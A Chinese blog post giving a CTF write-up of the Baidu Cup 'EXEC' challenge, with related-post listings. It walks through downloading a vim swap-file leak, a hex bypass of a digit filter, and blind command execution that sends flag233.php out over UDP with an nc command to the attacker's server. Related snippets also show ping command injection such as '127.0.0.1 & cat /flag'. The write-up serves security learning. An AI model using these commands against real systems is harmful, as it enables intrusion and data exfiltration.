百度杯CTF比赛 十月场-------EXEC

最新推荐文章于 2024-05-16 14:19:20 发布
最新推荐文章于 2024-05-16 14:19:20 发布
阅读量2.6k 收藏 1
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/82223811
版权

===============================

个人收获

1.命令盲注

2.vim文件泄露

3.nc的使用

 

================================

 

题目:

 

查看源码出现这个,猜测为vim文件泄露

再浏览器输入.index.php.swp果然出现下载连接

 

我们把下载来的文件用 vim打开

vim -r  .index.php.swp

<html>
<head>
<title>blind cmd exec</title>
<meta language='utf-8' editor='vim'>
</head>
</body>
<img src=pic.gif>
<?php
/*
flag in flag233.php
*/
 function check($number)
{
        $one = ord('1');
        $nine = ord('9');
        for ($i = 0; $i < strlen($number); $i++)
        {
                $digit = ord($number{$i});
                if ( ($digit >= $one) && ($digit <= $nine) )
                {
                        return false;
                }
        }
           return $number == '11259375';
}
if(isset($_GET[sign])&& check($_GET[sign])){
        setcookie('auth','tcp tunnel is forbidden!');
        if(isset($_POST['cmd'])){
                $command=$_POST[cmd];
                $result=exec($command);
                //echo $result;
        }
}else{
        die('no sign');
}

这里有一个check函数需要绕过,这个函数会对照number的每个数字,绕过再1-9的范围内就返回错误,但是最后又要==11259375,很明显这里可以用十六进制来绕过即可

里面还有 setcookie('auth','tcp tunnel is forbidden!'); 这段提示说明TCP被禁止不能用curl,而且cmd命令执行后也没有回显,但最前面的注释告诉了我们flag的文件,那么我们直接用nc命令把flag文件下过来,我们需要一台有公网ip的服务器

我们再服务器上运行

nc -u -l -p 55566

然后再题目哪post  cmd=nc -u 你的ip地址 55566 < flag233.php

 

大方子
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF比赛中的常见题型-适合初学者
08-17
CTF比赛中的常见题型--适合初学者
i春秋-百度十月-EXEC
S1lenc3的博客
11-01 120
进入网站,查看源代码,发现是用vim编辑,而抓包没有有效信息,加参数也无果。百度查了一下vim能形成什么文件。找到答案说,用vim编辑文本xxx.php中途退出,会自动创建一个文件.xxx.php.swp。然后我们下载这个文件。 用 vim -r 命令恢复文件,得到源码: <html><head><title>blind cmd exec&...
i春秋 “百度CTF比赛 十月 Exec
include_heqile的博客
10-08 1090
https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;r=0 进入题目链接,是一只猫咪 查看网页源代码: &amp;amp;lt;html&amp;amp;gt; &amp;amp;lt;head&amp;amp;gt; &amp;amp;lt;title&amp;amp;gt;blind cmd exec&amp;amp;lt;/title&amp;amp;gt; &
Buuctf-Web-[ACTF2020 新生赛]Exec 题解&amp;思路总结_actf新生赛(2)
最新发布
2401_84968060的博客
05-16 257
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
命令执行i春秋
hkk1151043545的博客
10-18 225
标题提示blind cmd exec,意思是命令盲注,第一次遇到,右键查看下源代码 发现了一个editor=‘vim’,这个vim就是linux中的vim命令,得知是vim文件泄漏,百度了一下: 非正常关闭vi/vim编辑器时(比如关机什么的)会产生一个.swp的备份文件已备不测,如果你正常退出,那么这个文件就会被自动删除。使用vim -r (filename)就可以恢复该文件。 那么尝试一下访问.index.php.swp,成功并下载了一个文件,用上面的方法恢复一下 vim -r .index.php
[ACTF2020]exec
m0_56691564的博客
11-30 288
每日一题,点开进入题目,可以看见一个ping,首先第一反应是输入自己电脑的地址,可以得到....
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
ctf-all-in-one.pdf
05-25
CTF-All-In-One(CTF 从入门到放弃) ——“与其相信谣言,不如一直学习。”ctf基础加入门题
CTF-All-In-One 20171015
10-15
CTF-All-In-One 20171015 CTF-All-In-One 20171015 一本 CTF 领域的大杂烩指南
BUUCTF 之 [ACTF2020 新生赛]Exec(命令执行漏洞)
两个月亮
01-08 1224
这界面和这网页标题结合起来,相信给位都能猜到这个靶中很有可能存在命令执行漏洞。文件往往位于根目录下,但也不要被反套路了。可以看到并没有我们期望的文件。这些文件夹都不需要管它,在。
百度CTF比赛 十月 EXEC
feng的博客
10-27 621
WP 首先进入环境,有两种方式得到源码。一种是直接dirsearch扫,扫出存在.index.php.swp,第二种是f12看源码,发现: 暗示可能存在vim源码泄露,也能猜到.index.php.swp。 下载下面,vim -r index.php.swp,就可以复原文件,得到index.php的源码: <?php /* flag in flag233.php */ function check($number) { $one = ord('1'); $nine = ord('9'
i春秋——“百度CTF比赛 十月——EXEC(命令执行、带外通道传输数据)...
weixin_30292843的博客
10-14 490
查看源码得知由vim编写,所以查找备份以及交换文件 找到 /.index.php.swp ,下载后用vim -r恢复该文件即可得到源码 1 <html> 2 <head> 3 <title>blind cmd exec</title> 4 <meta language='utf-8' editor='vim'...
Exec CTF题目
weixin_44971601的博客
09-29 335
BUUCTF命令执行漏洞题目
CTF】命令执行RCE
qq_53099119的博客
04-02 2617
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
BUUCTF【Web】Exec(命令执行漏洞)
qq_70434663的博客
03-02 1003
在根目录中我们发现有一个flag文件,猜测我们的flag就在里面,所以我们需要使用命令来读取flag文件的内容。命令大家可以在网上查看,这里使用的命令是127.0.0.1 & cat /flag(也可以使用127.0.0.1 | cat /flag)了解拼接符后我们先试一下查看目录,发现使用127.0.0.1 && ls执行不了,使用127.0.0.1 & ls有回显。在进入靶后发现窗口ping,猜测可能是SQL注入,也有可能是命令执行漏洞。命令执行就用命令拼接符执行漏洞命令就行。
[原题复现]百度CTF比赛 十月 WEB EXEC(PHP弱类型)
笑花大王
03-12 666
简介 原题复现: 考察知识点:PHP弱类型、 线上平台:https://www.ichunqiu.com/battalion(i春秋 CTF平台) 过程 看源码发现这个 vim泄露 下方都试了一遍 。index.php.swp是的 下载源码即可 .index.php.swpindex.php.swp ——vim文件泄露index.php.bakindex.php~ 要通过...
BUUCTFExec,攻防世界之command_execution
金 帛的博客
03-16 2090
BUUCTFWP

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值